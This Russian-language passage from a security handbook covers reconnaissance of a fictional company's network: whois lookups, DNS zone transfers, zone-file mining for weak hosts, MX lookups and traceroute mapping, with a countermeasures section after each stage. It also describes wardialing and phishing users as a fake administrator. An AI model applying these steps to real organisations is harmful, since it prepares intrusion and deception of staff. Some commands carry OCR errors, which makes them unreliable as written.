    Для того чтобы определить такие доменные имена и приступить к выявлению данных о подключенных к ним сетям, необходимо обратиться к соответствующим средствам Internet. Много полезной информации можно почерпнуть, например, из специальных баз данных. До конца 1999 года компания Network Solutions имела монополию на регистрацию имен доменов (com, net, edu и org) и соответствующая информация содержалась на ее специальных серверах. Однако в настоящее время существует множество других аккредитованных компаний, которые могут выполнять те же функции (http://www.internic.net/alpha.html). Если в процессе поиска требуемой информации нужно обратиться к такой компании-регистратору, то в этот процесс должны быть вовлечены также и все новые организации (см. раздел "Регистрационный Запрос").
    Предусмотрено множество различных методов генерации запросов whois к базам данных (табл. 1.2). Независимо от того, какой из них вы выберете, полученная информация будет практически одной и той же. При поиске имен доменов, отличных от com, net, edu или org, необходимо обращаться и к другим серверам, перечисленным в табл. 1.3. Еще одним полезным ресурсом, особенно при поиске за пределами США, является сервер www.allwhois.com. В сети Internet предоставляемая им информация является наиболее полной.

    Таблица 1. 2. Источнйки информации и методы поиска с помощью команды whois

    Механизм
    Ресурсы
    Платформа
    Web-интерфейс
    http://www.networksolutions.com 
    http ://www.arin.net
    Любая платформа с Web-клиентом
    Клиент whois
    whois входит в комплект поставки большинства версий UNIX. Кроме того, имеется утилита fwhois, разработанная Крисом Капуччио (Chris Cappuccio, ccappucg santef e . edu)
    UNIX
    WS Ping ProPack
    http : //www.ipswitch.com
    Windows 95/NT/2000
    Sam Spade
    http : //www.samspade.org/ssw
    Windows 95/NT/2000
    Sam Spade, Web-интерфейс
    http : //www.samspade.org/
    Любая платформа с Web-клиентом
    Средства Netscan
    http://www .nwspsw.com/
    Windows 95/NT/2000
    Xwhois
    http://www.oxygene.500mhz.net/whois/
    UNIX с X Window и набором средств графического интерфейса GTK+

    Таблица 1.3. Базы данных, содержащие сведения о военных, правительственных и международных доменах

    Сервер whois
    Адрес
    IP-адреса, используемые в Европе
    http://whois.ripe.net
    IP-адреса тихоокеанского региона Азии
    http : //whois.apnic.net
    Военные ведомства США
    http://whois.nic.mil
    Правительственные учреждения США
    http ://whois.nic.gov
    Разные виды запросов позволяют получить различную информацию. Ниже перечислены типы запросов, с которыми в подавляющем большинстве случаев к службам whois обращаются хакеры, планирующие попытку проникновения в сеть организации.
    •  Регистрационный. Отображает специфическую регистрационную информацию и соответствующие серверы whois.
    •  Организационный. Отображает всю информацию, имеющую отношение к организации с заданным названием.
    •  Доменный. Отображает всю информацию, связанную с заданным доменом.
    •  Сетевой. Отображает всю информацию, связанную с заданной сетью или отдельным IP-адресом.
    •  Контактный. Отображает всю информацию о заданном лице, как правило, являющемся администратором сети.

    Регистрационный запрос



    С появлением совместно используемой системы регистрации (т.е. нескольких компаний-регистраторов) для получения списка доменов и соответствующей регистрационной информации, связанной с данной организацией, необходимо обратиться к серверу whois.crsnic.net. Следует определить компанию-регистратор и, таким образом, базу данных, к которой можно будет обращаться с последующими запросами на получение более подробных данных. В данном случае в качестве целевой будет использоваться компания Acme Networks, а запрос будет выполняться из командной оболочки системы UNIX (Red Hat 6.2). В используемой версии команды whois с помощью параметра @ можно задать альтернативную базу данных. В некоторых системах из ряда BSD (например, OpenBSD или FreeBSD) для этого можно воспользоваться параметром -а. Для получения более подробной информации об использовании клиента whois для генерации запросов воспользуйтесь командой man whois.
    При выполнении поиска полезно использовать символы-заполнители, поскольку в этом случае можно получить дополнительную информацию. Если после строки acme в запросе используется символ ".", то будет получен список всех доменов, имена которых начинаются со строки acme, а не все домены, имена которых в точности содержат эту строку. Кроме того, при формировании расширенных запросов за консультацией можно обратиться по адресу http: //www.networksolutions.com/help/whoishelp.html. Руководствуясь приведенными в этом документе советами, запрос можно сгенерировать более точно.

    [bash]$ whois "acme."@whois.crsnic.net
    [whois.crsnic.net] Whois Server Version 1.1
    Domain names in the .com, .net, and .org domains can now be registered
     with many different competing registrars.
    Go to http://www.internic.net for detailed information.
    ACMETRAVEL.COM 
    ACMETECH.COM
     ACMES.COM 
    ACMERACE.NET
     ACMEINC.COM 
    ACMECOSMETICS.COM 
    ACME.ORG
     ACME.NET 
    ACME.COM
     ACME-INC.COM

    Если о домене acme. net необходимо получить дополнительную информацию, то поиск можно продолжить и определить компанию-регистратор.

    [bash]$ whois "acme.net"@whois.crsnic.net
    Whois Server Version 1.1
    Domain names in the .com, .net, and .org domains can now be registered
    with many different competing registrars.
    Go to http://www.internic.net for detailed information.
    Domain Name: ACME.NET
    Registrar: NETWORK SOLUTIONS, INC.
    Whois Server: whois.networksolutions.com
    Referral URL: www.networksolutions.com
    Name Server-: DNS1 .ACME .NET
    Name Server: DNS2.ACME.NET

    Из полученных результатов видно, что для данной организации компанией-регистратором является Network Solutions, что является достаточно обычным для любой организации, зарегистрированной до ввода в действия новой системы регистрации. В дальнейшем последующие запросы должны быть адресованы соответствующей компании-регистратору, поскольку именно на ее сервере содержится требуемая информация.

    Организационный запрос



    После идентификации компании-регистратора можно приступать к формированию организационного запроса. Такой тип запроса позволяет выполнить поиск компании-регистратора для всех экземпляров имен рассматриваемой организации. Он гораздо шире, чем просто поиск имени домена. Организационный запрос должен содержать ключевое слово name и быть отправлен компании Network Solutions.

    [bash]$ whois "
    name Acme Networks"@whois.networksolutions.com

    Acme Networks (NAUTILUS-AZ-DOM) NAUTILUS-NJ.COM
    Acme Networks (WINDOWS4-DOM) WINDOWS.NET
    Acme Networks (BURNER-DOM) BURNER.COM
    Acme Networks (ACME2-DOM) ACME.NET
    Acme Networks (RIGHTBABE-DOM) RIGHTBABE.COM
    Acme Networks (ARTS2-DOM) ARTS.ORG
    Acme Networks (HR-DEVELOPMENT-DOM) HR-DEVELOPMENT.COM
    Acme Networks (NTSOURCE-DOM) NTSOURCE.COM
    Acme Networks (LOCALNUMBER-DOM) LOCALNUMBER.NET
    Acme Networks (LOCALNUMBERS2-DOM) LOCALNUMBERS.NET
    Acme Networks (Y2MAN-DOM) Y2MAN.COM
    Acme Networks (Y2MAN2-DOM) Y2MAN.NET
    Acme Networks for Christ Hospital (CHOSPITAL-DOM) CHOSPITAL.ORG

    Из полученного списка видно, что к компании Acme Networks имеет отношение много доменов. Однако пока неясно, представляют ли они реальные сети или же зарегистрированы для будущего использования либо для зашиты торговых марок. Для получения ответов на эти вопросы необходимо продолжить исследования, пока не будут обнаружены реальные сети.
    Для большой организации в результате организационного запроса можно получить сотни и даже тысячи записей. Раньше, когда спэмминг (spamming) был не так популярен, можно было получить всю регистрационную базу домена .com компании Network Solutions. Однако в настоящее время серверы этой компании настроены таким образом, чтобы ограничивать результат первыми 50 записями.

    Доменный запрос



    Проанализировав результаты организационного запроса, приходим к выводу, что наиболее вероятным кандидатом для изучения является домен Acme.net, поскольку он представляет саму компанию Acme Networks (естественно, все реальные имена и адреса были изменены). 

    [bash]$ whois acme.net@whois.networksolutions.com
    [whois.networksolutions.com]
     Registrant:
    Acme Networks (ACME2-DOM) 
    li Town Center Ave. Einstein, AZ 21098
    Domain Name: ACME.NET
    Administrative Contact, Technical Contact, Zone Contact:
    Boyd, Woody [Network Engineer] (WB9201) woody@ACME.NET
    201-555-9011 (201)555-3338 (FAX) 201-555-1212
    Record last updated on 13-Sep-95.
    Record created on 30-May-95.
    Database last updated on 14-Apr-99 13:20:47 EOT.
    Domain servers in listed order:
    DNS.ACME.NET 10.10.10.1
    DNS2.ACME.NET 10.10.10.2

    Подобный запрос позволяет получить следующую информацию. 

    • Организация, зарегистрировавшая домен (Registrant).
    •  Имя домена (Domain Name).
    •  Имя, фамилия, почтовый адрес, телефон и адрес электронной почты администратора домена (Administrative Contact).
    •  Дата создания и обновления записи.
    •  Имена и адреса первичного и вторичных серверов DNS.

    Теперь пришло время проявить способности детектива. Для того чтобы проанализировать полученную информацию и извлечь из нее что-то полезное, необходимо иметь определенные знания. Обычно мы называем такого рода информацию "нюансами", поскольку она уточняет имеющиеся в распоряжении взломщика сведения и позволяет осуществить более сфокусированную атаку. Давайте подробнее рассмотрим приведенные в примере данные.
    Проверив информацию об организации, зарегистрировавшей домен, можно сделать вывод от том, действительно ли домен принадлежит интересующему нас объекту. Допустим, нам известно, что компания Acme Networks находится в штате Аризона. На основании этой информации можно сделать вывод о том, что полученные сведения имеют отношение к собираемым данным. Не забывайте, что местонахождение организации, зарегистрировавшей домен, необязательно совпадает с физическим расположением объекта. Многие организации имеют распределенные сети, каждая из которых самостоятельно подключена к Internet. Однако при этом они могут быть зарегистрированы как один объект. Поэтому проанализируйте полученные сведения и установите, имеет ли отношение регистратор домена к интересующей вас организации. Доменное имя, которое мы получили, совпадает с именем, которое мы использовали в запросе, поэтому в данном случае мы не узнали ничего нового.
    Данные администратора домена — это очень важная информация, так как с их помощью можно узнать имя человека, ответственного за подключение к Internet или работу брандмауэра. Кроме того, в них содержатся номера телефонов и факсов. Если вы планируете предпринять попытку проникновения в сеть с использованием средств удаленного доступа, эта информация будет для вас очень важна. Достаточно настроить программу автопрозвона (wardialer) на полученные номера, и это будет хорошим началом процесса идентификации потенциальных номеров модемных соединений. Кроме того, взломщики часто используют информацию об администраторе, чтобы выведать сведения о системе у ничего не подозревающих пользователей. Например, взломщик может отправить пользователю дезинформирующее электронное сообщение от имени администратора, указав в качестве обратного свой адрес, а не адрес администратора. Просто удивительно, как много пользователей послушно меняют свой пароль на любой, который им укажет такой "администратор", основываясь лишь на предположении, что сообщение пришло из службы технической поддержки.
    Даты создания и модификации записи говорят о том, насколько полученная информация соответствует действительности. Если запись была создана пять лет тому назад и с тех пор не обновлялась, скорее всего, что, как минимум, ее часть (например, сведения об администраторе) уже устарела.
    В последнем фрагменте содержатся сведения о серверах DNS, обслуживающих данный домен. Первый сервер является первичным, а второй и все последующие — вторичными. Эта информация позднее понадобится для изучения серверов DNS, о чем мы поговорим ниже в этой главе. Кроме того, можно попробовать получить информацию о сети, используя в качестве исходных данных сетевого запроса адреса серверов DNS.

    С помощью директивы server, примененной к записи HST, информация о которой получена из запроса whois, можно установить другие домены, обслуживаемые заданным DNS-сервером. Для этого необходимо выполнить следующие действия.
    1. Выполните доменный запрос, как описывалось выше.
    2. Найдите в полученных результатах сведения о первом сервере DNS.
    3. Введите запрос whois для этого сервера DNS:
    whois "HOST 10.10.10.l"@whois.networksolutions.com
    4. Среди полученных результатов найдите запись HST для этого сервера DNS.
    5. Выполните запрос whois с директивой server:
    whois "SERVER NS9999-HST"@whois.networksolutions.com


    Сетевой запрос



    Для идентификации сетей, ассоциированных с конкретным доменом, может использоваться база данных ARIN (American Registry for Internet Numbers). В ней содержатся конкретные диапазоны адресов, которыми обладает данная организация. Сгенерировать такой запрос очень важно, поскольку он позволит определить, действительно ли конкретный адрес принадлежит заданной организации, а не относится к другой организации, например провайдеру услуг Internet.
    В рассматриваемом примере мы попробуем определить все сети, принадлежащие компании Acme Networks. Запрос к базе данных ARIN является очень удобным, поскольку при этом не налагается ограничение на получение первых пятидесяти записей, реализованное компанией Network Solutions. Обратите внимание, что в строке запроса фигурирует символ заполнения ". ".

    [bash]$ whois "Acme Net."@whois.arin.net
    [whois.arin.net]
    Acme Networks (ASN-XXXX) XXXX 99999
     Acme Networks (NETBLK) 10.10.10.0 - 10.20.129.255

    С использованием определенного адреса (10.10.10.0) можно сформировать более специализированный запрос.

    [bash]$ whois 10.10.10.08whois.arin.net
    [whois.arin.net]
    Major ISP USA (NETBLK-MI-05BLK) MI-05BLK
    10.10.0.0 - 10.30.255.255
    ACME NETWORKS, INC. (NETBLK-MI-10-10-10)
    CW-10-10-10 10.10.10.0 - 10.20.129.255

    База данных ARIN предоставляет удобный Web-ориентированный механизм обработки запросов, показанный на рис. 1.4. Возвращаясь к полученным результатам, можно заключить, что сеть интересующей нас компании Acme Networks адресуется главным провайдером Major IPS USA как сеть класса А (полное изложение основ протокола TCP/IP можно найти в книге Ричарда Стивенса (Richard Stevens) TCP/IP Illustrated, Volume 1). Таким образом, можно заключить, что эта сеть и является внутренней сетью компании Acme Networks. 



    Рис. 1.4. Один из самых простых методов поиска информации в базе данных ARIN состоит в использовании интерфейса ее Web-узла

    Контактный запрос



    Поскольку технический служащий, чьи данные указаны в регистрационных данных, может заниматься администрированием нескольких организаций, имеет смысл обратиться к базе whois с контактным запросом по пользовательскому дескриптору базы данных. В данном случае воспользуемся дескриптором WB9201, полученным в предыдущем доменном запросе. Таким образом можно выявить домен, о существовании которого вы даже не подозреваете.

    [bash]$ whois "HANDLE WB9201"@whois.networksolutions.com
    Boyd, Woody [Network Engineer] (WB9201) woody@ACME.NET
    BIG ENTERPRISES
    11 TOWN CENTER AVE
    EINSTEIN, AZ 20198 201-555-1212
    (201)555-1212 (FAX) 201-555-1212

    Можно также попробовать поискать записи, содержащие часть адреса @Acme.net, и получить список всех адресов электронной почты данного домена. Для краткости мы приведем лишь часть полученных данных.

    [bash]$ whois "@Acme.net"@whois.internic.net
    Smith, Janet (JS9999) jsmith@ACME.NET (201)555-9211 (FAX)
    (201)555-3643
    Benson, Bob (BB9999) bob@ACME.NET (201)555-0988
    Manual, Eric(EM9999) ericm@ACME.NET (201)555-8484 (FAX)
    (201)555-8485 Bixon, Rob (RB9999) rbixonSACME.NET (201)555-8072

    Контрмеры: обеспечение безопасности общедоступных баз данных



    Большая часть информации, хранящейся в описанных базах данных, открыта для свободного доступа. Когда организация намеревается зарегистрировать собственный домен, она обязана предоставить контактную информацию, сведения о выделенных ей блоке сетевых адресов и серверах DNS. Однако для того чтобы усложнить задачу взломщикам, необходимо придерживаться определенных принципов обеспечения безопасности.
    Очень типичной является ситуация, когда администратор, давно уволившийся из организации, по-прежнему может изменить регистрационную информацию об этой организации. Поэтому прежде всего нужно постоянно следить за тем, чтобы информация, хранящаяся в этой базе данных, была точной. При первой же необходимости обновляйте административные, технические и финансовые контактные данные. Более того, продумайте, как обезопасить себя от возможного использования злоумышленниками номеров телефонов, указанных в контактных данных (например, взломщик может воспользоваться этими номерами для автопрозвона). Если это возможно, воспользуйтесь номерами бесплатных телефонов (toll-free) или номерами, которые не используются в вашей организации. Нам приходилось встречаться с организациями, которые указывали в качестве администратора вымышленное лицо, что, без условно, может оказаться западней для злоумышленника. Если любой сотрудник организации знает, что в случае получения электронного сообщения или звонка от имени человека, представляющегося администратором с указанным в регистрационных данных вымышленным именем, он должен немедленно уведомить об этом службу безопасности — это, безусловно, затруднит задачу взломщика.
    Еще одна потенциальная опасность, связанная с регистрацией доменов, состоит в том, что некоторые компании-регистраторы разрешают обновлять регистрационные данные. Например, в настоящее время компания Network Solutions разрешает автоматически изменять доменную информацию через Internet. При этом лицо, зарегистрировавшее домен, аутентифицируется одним из следующих трех способов: по содержимому поля FROM электронной почты, с помощью пароля и с помощью алгоритма шифрования Pretty Good Privacy (PGP). К сожалению, по умолчанию используется метод проверки содержимого поля FROM, который (невероятно, но факт!) и выбирают многие администраторы сетей при регистрации своих доменов. Естественно, ни о какой безопасности при таком подходе говорить не приходится. Любой злоумышленник может воспользоваться электронным адресом администратора и изменить информацию о домене. (Такая ситуация получила название "доменного пиратства" (domain hijacking).) Именно это и произошло с компанией AOL 16 октября 1998 года, о чем рассказывалось в газете Washington Post. Кто-то выдал себя за служащего AOL и изменил доменную информацию AOL таким образом, чтобы все запросы к их серверам отправлялись в домен autonete.net. Конечно, компания AOL быстро восстановила работоспособность серверов, однако этот случай очень ярко демонстрирует, насколько порой хрупким может быть все, что связано с Internet. Поэтому важно выбрать какое-то более надежное решение, защитив регистрационные данные с помощью пароля или PGP. Более того, необходимо, чтобы изменение административных или технических контактных данных выполнялось с использованием механизма аутентификации с помощью формы Contact Form узла Network Solutions.


    4.gif

    Изображение: 

    7. Этап 3. Прослушивание серверов DNS



    Этап 3. Прослушивание серверов DNS


    После установления всех доменов можно приступать к работе с серверами DNS. DNS — это распределенная база данных, предназначенная для преобразования IP-адресов в имена узлов и наоборот. Если сервер DNS не настроен на обеспечение максимальной степени защиты, то с его помощью можно получить информацию о внутренней сети организации.

    Перенос зоны



    Одна из самых серьезных ошибок администратора при настройке параметров сети состоит в предоставлении возможности взломщику осуществить перенос зоны DNS.
    При переносе зоны (zone transfer) вторичный сервер DNS может обновить собственную базу данных зоны на основании данных, полученных от первичного DNS-сервера. Это позволяет обеспечить избыточность в работе службы DNS, которая необходима для тех случаев, когда первичный сервер по каким-то причинам становится недоступным. В общем случае вполне достаточно, чтобы перенос зоны выполнялся только вторичным DNS-сервером. Однако многие DNS-серверы настроены таким образом, что предоставляют копию зоны любому узлу Internet по первому же запросу. В этом нет ничего плохого при условии, что предоставляемая информация содержит лишь сведения о компьютерах, непосредственно подключенных к Internet. Однако такая возможность таит в себе опасность того, что полученные взломщиком сведения могут облегчить его задачу проникновения в сеть. Эта угроза реализуется в полной мере, когда в организации не используется механизм разделения DNS-информации на общедоступную и закрытую. Если это так, то любой желающий без особых проблем может получить сведения об именах узлов и IP-адресах внутренней сети. Предоставление информации о внутренних IP-адресах кому попало можно сравнить лишь с предоставлением полной схемы внутренней сети организации.
    Давайте рассмотрим несколько методов переноса зоны, а также выясним, какие сведения можно получить из этих данных. Из всего множества различных инструментов, которые можно применять для выполнения данной операции, мы рассмотрим лишь самые распространенные.
    Один из самых простых методов переноса зоны состоит в использовании клиента nslookup, который обычно входит в комплект поставки большинства версий UNIX и NT. Воспользуемся этой утилитой и введем следующие данные.

    [bash]$ nslookup
    Default Server: dns2.acme.net
    Address: 10.10.20.2
    >> server 10.10.10.2
    Default Server: [10.10.10.2]
    Address: 10.10.10.2
    >> set type=any
    >> Is -d Aome.net. >> /tmp/zone_out

    Первая введенная команда — это запуск утилиты nslookup в интерактивном режиме. После запуска утилита сообщает, какой сервер им,ен в данный момент используется по умолчанию. Обычно таким сервером является DNS-сервер вашей организации или DNS-сервер провайдера. Поскольку используемый в данном примере DNS-сервер (10.10.20.2) не обслуживает интересующий нас домен, нам нужно перейти на другой сервер, на котором мы сможем найти необходимую информацию о внутренней сети. Таким образом, утилите nslookup необходимо явно сообщить о том, к какому серверу DNS ей нужно обратиться. В нашем примере мы будем использовать основной сервер сети Acme Networks с адресом 10.10.10.2. Вспомните, что его адрес мы узнали из регистрационной базы данных доменов на предыдущем этапе. Затем мы устанавливаем тип записи any, что означает, что в список выбранных записей будут отобраны все записи из базы данных DNS-сервера. (Подробнее о параметрах утилиты nslookup можно узнать с помощью команды man nslookup (UNIX) или nslookup ? (NT).)
    И наконец, для получения всех записей, соответствующих заданному критерию, воспользуемся командой Is. Параметр -d служит для включения режима вывода всех записей домена. В конце доменного имени добавлен символ ".", как это требуется для явного задания полностью определенного имени (fully qualified domain name). Однако в большинстве случаев точку можно не использовать. Кроме того, мы переназначили вывод в файл /tmp/zone_out для возможности дальнейшего анализа полученных данных.
    После выполнения переноса зоны можно открыть созданный файл и посмотреть, содержится ли в нем информация, которая может помочь нам в выборе какой-то конкретной системы в качестве плацдарма для проникновения в сеть. Вот фрагмент такого файла.

    [bash]$ more zone_out
    acctlS ID IN A ' 192.168.230.3
    ID IN HINFO "Gateway2000" "WinWKGRPS"
    ID IN MX 0 acmeadmin-smtp
    ID IN RP bsmith.rci bsmith.who
    ID IN TXT "Location:Telephone Room"
    ce ID IN CNAME aesop
    au ID IN A 192.168.230.4
    ID IN HINFO "Aspect" "MS-DOS"
    ID IN MX 0 andromeda
    ID IN RP jcoy.erebus jcoy.who
    ID IN TXT "Location: Library"
    acct21 ID IN A 192.168.230.5
    ID IN HINFO "Gateway2000" "WinWKGRPS"
    ID IN MX 0 acmeadmin-smtp
    ID IN RP bsmith.rci bsmith.who
    ID IN TXT "Location:Accounting"

    Мы не будем рассматривать подробно каждый элемент всех найденных записей, а остановимся лишь на некоторых важных типах информации, которую можно получить таким образом. Как видно из приведенного выше листинга, для каждого узла имеется запись типа 'А, содержащая IP-адрес узла, имя которого указано в левом столбце. Кроме того, каждый узел имеет запись типа HINFO, идентифицирующую используемую платформу или операционную систему (описание см. в RFC 952). Информация записей HINFO не используется операционными системами, однако очень часто оказывается полезной для взломщиков. Поскольку результаты переноса зоны сохранены в файле, то его содержимое без особых проблем можно отсортировать с помощью таких программ UNIX, как grep, sed, awk или perl.
    Предположим, взломщик является экспертом какой-нибудь определенной операционной системы, например SunOS или Solaris. В таком случае найти в файле IP-адреса, соответствующие записям HINFO компьютеров SPARC, Sun или Solaris, можно с помощью следующей команды.

    [bash]$ grep -i Solaris zone_out |wc -1 388

    Таким образом, взломщик имеет 388 записей, в которых присутствует слово Solaris, и каждый из этих 388 компьютеров может стать потенциальной жертвой.
    Предположим, нужно найти компьютеры, которые используются для тестирования программного обеспечения или аппаратных средств. Такие компьютеры часто представляют "лакомый кусок" для взломщика, поскольку обычно на них установлены минимальные средства обеспечения безопасности, используется легко угадываемый пароль, а администраторы, как правило, не следят за тем, кто за ними работает. Такие компьютеры идеально подходят для взлома! Поэтому можно попробовать поискать тестовые системы с помощью следующей команды.

    [bash]$ grep -i test /tmp/zone_out |wc -1 96

    Итак, в нашем распоряжении около сотни записей файла зоны, в которых содержится слово test. Как правило, это количество примерно соответствует количеству реальных тестовых систем сети. Приведенные примеры — лишь малая часть того, что можно при известной доле настойчивости и изобретательности получить из файла зоны. Опытный взломщик, "просеяв через сито" полученные данные, рано или поздно выявит самый уязвимый компьютер сети, с которого он сможет начать вторжение.
    Существуют некоторые особенности, о которых нужно помнить. Вышеописанный метод позволяет одновременно обращаться лишь к одному серверу имен. Это означает, что взломщику придется выполнить те же операции по отношению ко всем остальным серверам имен, обслуживающим требуемый домен. Кроме того, мы обращались с запросом лишь к домену Acme.net. Если в представляющей интерес сети имеются подчиненные домены, придется выполнить те же действия и с каждым из них (например, greenhouse.Acme.net). И наконец, можно получить сообщение о том, что список записей домена недоступен или что запрос не может быть выполнен. Такое сообщение обычно говорит о том, что параметры настройки запрещают выполнять перенос зоны с этого сервера. Однако если в сети несколько серверов, то, возможно, удастся найти тот из них, который позволяет осуществлять перенос зоны.
    Теперь, когда вы познакомились с тем, как перенос зоны выполняется вручную, можно рассмотреть и те средства, которые позволяют ускорить этот процесс. К таким средствам относятся host, Sam Spade, axfr и dig.
    Команда host входит в комплект поставки многих версий системы UNIX. Вот несколько самых простых способов ее использования. 
     host -1 Acme.net
    или 
    host -I -v -t any Acme.net
    Если нужно определить лишь IP-адреса, чтобы впоследствии вставить их в сценарий оболочки, можно воспользоваться командой cut, позволяющей выделить IP-адреса из выходного листинга команды host.

    >>host -l acme.net |cut -f 4 -d" " » /tmp/ip_out

    В процессе предварительного сбора данных использовать команды системы UNIX для выполнения всех задач нет необходимости. Существует довольно много продуктов для Windows, которые позволяют получить ту же информацию (рис 1.5).
    И наконец, можно воспользоваться одним из лучших средств переноса зоны — утилитой axfr (http://ftp.edit.edu.cn/pub/linux/
    www.trinux.org/src/netmap/axfr-0.5.2.tar.gz
    ), написанной Гаюсом (Gaius). Эта утилита последовательно опрашивает указанные домены, выполняет для каждого из них перенос зоны и создает сжатую базу данных зоны и файлов узлов по каждому домену. Кроме того, в качестве параметра этой утилите можно передать домены верхнего уровня, такие как com или edu, и получить таким образом список всех доменов, связанных с указанным доменом. Однако этой возможностью пользоваться не рекомендуется. Для запуска утилиты axfr используйте следующую команду.

    [bash]$ axfr Acme.net
    axfr: Using default directory:
    /root/axfrdb Found 2 name servers for domain 'Acme.net.':
    Text deleted.
    Received XXX answers (XXX records).

    Для того чтобы обратиться с запросом к полученной с помощью утилиты axf r базе данных, необходимо ввести следующую команду. [bash]$ axfrcat Acme.net

    Получение записей обмена почтой (MX)



    Определение компьютера, на котором обрабатывается почта,— это один из наиболее удачных способов выявления сетевого брандмауэра представляющей интерес организации. Как правило, в коммерческих компаниях почта обрабатывается на том же компьютере, который служит в качестве брандмауэра, или по крайней мере на компьютере, который находится в том же сегменте сети. Для получения более подробной информации можно воспользоваться командой host.

    [bash]$ host Acme.net
    Acme.net has address 10.10.10.1
    Acme.net mail is handled (pri=20) by smtp-forward.Acme.net
    Acme.net mail is handled (pri=10) by gate.Acme.net



    Рис. 1.5. Приверженцы Windows могут выполнить перенос зоны, а также другие задачи предварительного сбора данных с помощью многофункциональной утилиты Sam Spade

    Если команда host применяется без параметров либо только с именем домена, то сначала она попытается найти записи А, а затем записи MX. Приведенная выше информация пересекается с той информацией, которую ранее была получена при поиске в базе данных ARIN с использованием утилиты whois. Это лишний раз подтверждает, что мы правильно определили адрес нужной нам сети.

    Контрмеры: обеспечение безопасности базы данных DNS



    Информация DNS представляет для хакера очень большой интерес, поэтому очень важно уменьшить объем данных, доступных через Internet. С точки зрения настройки узла, необходимо ограничить возможность переноса зоны, разрешив ее лишь определенным серверам. В современных версиях службы BIND для этих целей можно использовать директиву xfernets файла named.boot. Для того чтобы ограничить возможность переноса зоны службы DNS компании Microsoft, необходимо использовать параметр Notify (более подробную информацию по этому вопросу можно найти по адресу http://support.-microsoft.eom/support/kb/articles/ql93/8/37.asp). Для настройки служб имен других разработчиков необходимо обратиться к соответствующей документации.
    С точки зрения зашиты сети необходимо настроить брандмауэр или фильтрующий маршрутизатор таким образом, чтобы они отсекали все несанкционированные входящие соединения с портом 53 протокола TCP. Поскольку в запросах на получение имен используется протокол UDP, а в запросах на перенос зоны — протокол TCP, это позволит эффективно пресекать любые попытки переноса зоны. Кроме того, целесообразно установить устройство управления доступом или систему выявления вторжений (IDS — intrusion detection system), чтобы регистрировать всю информацию, которая может свидетельствовать об опасных действиях.
    Ограничение возможности переноса зоны увеличит время, которое должен потратить взломщик, перебирая IP-адреса и пробуя разные имена узлов. Однако поскольку запросы на получение имен по-прежнему остаются разрешенными, взломщик может вручную перебрать все IP-адреса из выделенного для сети диапазона адресов. Таким образом, настройте внешние серверы имен так, чтобы они предоставляли информацию только о компьютерах, которые непосредственно подключены к Internet. Эти внешние серверы DNS ни при каких обстоятельствах не должны разглашать информацию о внутренней сети. Может показаться, что перечисленные выше рекомендации являются очевидными, однако мы не редко встречали DNS-серверы, которые позволяли "вытащить" из них более 16000 внутренних IP-адресов и имен узлов. И наконец, лучше не использовать записи HINFO. Как вы увидите ниже в этой главе, это вряд ли поможет скрыть от взломщика тип операционной системы, однако затруднит его задачу, так как он не сможет автоматизировать процесс получения данной информации программным способом.


    5.gif

    Изображение: 

    8. Этап 4. Зондирование сети



    Этап 4. Зондирование сети


    Установив возможные сетевые адреса, можно попытаться определить топологию сети, а также возможные пути проникновения в нее.

    Отслеживание маршрутов



    Эта задача может быть выполнена с помощью утилиты traceroute (ftp://ftp.ee. lbl.gov/traceroute.tar.Z), которая входит в комплект поставки практически всех версий UNIX и Windows NT. В системе Windows NT название утилиты адаптировано к формату 8.3 — tracert.
    Утилита traceroute, написанная Ван Якобсоном (Van Jacobson), представляет собой диагностическое средство, позволяющее отслеживать маршрут, по которому IP-пакеты проходят при передаче от одного узла к другому. Для получения от каждого из отслеживаемых узлов сообщения ICMP TIME_EXCEEDED утилита использует параметр TTL (time to live — время жизни) пакета IP. Каждый маршрутизатор, который обрабатывает такой пакет, должен уменьшить на единицу значения поля TTL. Таким образом, поле TTL играет роль счетчика пройденных узлов (hop counter). Мы воспользуемся утилитой traceroute, чтобы определить точный путь, по которому проходят наши пакеты. Как уже упоминалось выше, эта утилита играет роль зонда, с помощью которого можно выяснить топологию представляющей интерес сети. Кроме того, она позволяет выявить устройства управления доступом (программные брандмауэры или фильтрующие маршрутизаторы), которые могут отфильтровывать инициализируемый исследователем поток данных.
    Рассмотрим следующий пример.

    [bash]$ traceroute Acme.net
    traceroute to Acme.net (10.10.10.1), 30 hops max, 40 byte packets
    1 gate2 (192.168.10.1) 5.391 ms 5.107 ms 5.559 ms
    2 rtrl.bigisp.net (10.10.12.13) 33.374 ms 33.443 ms 33.137 ms
    3 rtr2.bigisp.net (10.10.12.14) 35.100 ms 34.427 ms 34.813 ms
    4 hssitrt.bigisp.net (10.11.31.14) 43.030 ms 43.941 ms 43.244 ms
    5 gate.Acme.net (10.10.10.1) 43.803 ms 44.041 ms 47.835 ms

    На основании полученной информации можно проследить путь, по которому пакеты, прошедшие через маршрутизатор (шлюз), проследовали, миновав три узла (2—4), к точке назначения. На всем пути следования пакеты нигде не были заблокированы. На основании ранее полученной информации известно, что МХ-запись домена Acme. net указывает на узел gate.acme.net. Следовательно, можно предположить, что этот узел является не логическим устройством, а реальным компьютером сети, а сегмент, через который пакет прошел на предыдущем шаге (4), — это пограничный маршрутизатор организации. Сегмент 4 может быть реализован как в виде выделенного программного брандмауэра, так и в виде простого фильтрующего маршрутизатора. На данном этапе об этом пока трудно судить. Как правило, именно на устройство, находящееся на сегменте, непосредственно за которым находится реальный компьютер сети, возлагается задача маршрутизации (например, маршрутизатор или брандмауэр).
    Рассмотренный пример слишком прост. В реальных ситуациях к одному и тому же узлу может вести несколько маршрутов, создаваемых устройствами с несколькими интерфейсами (например, маршрутизаторы серии Cisco 7500). Более того, каждый интерфейс может иметь собственный список управления доступом (ACL — access control list). Зачастую некоторые интерфейсы такого устройства пропускают запросы traceroute, а другие — нет, что определяется конкретным списком ACL. Таким образом, очень важно с помощью traceroute получить схему всей сети. После того как вы попробуете проследить с помощью traceroute маршруты, по которым проходят пакеты к каждому выявленному вами узлу сети, можно создать схему сети, наглядно демонстрирующую архитектуру шлюза Internet, а также показывающую, в каких местах расположены устройства, выполняющие функции управления доступом. Мы будем называть эту схему диаграммой путей доступа (access path diagram).
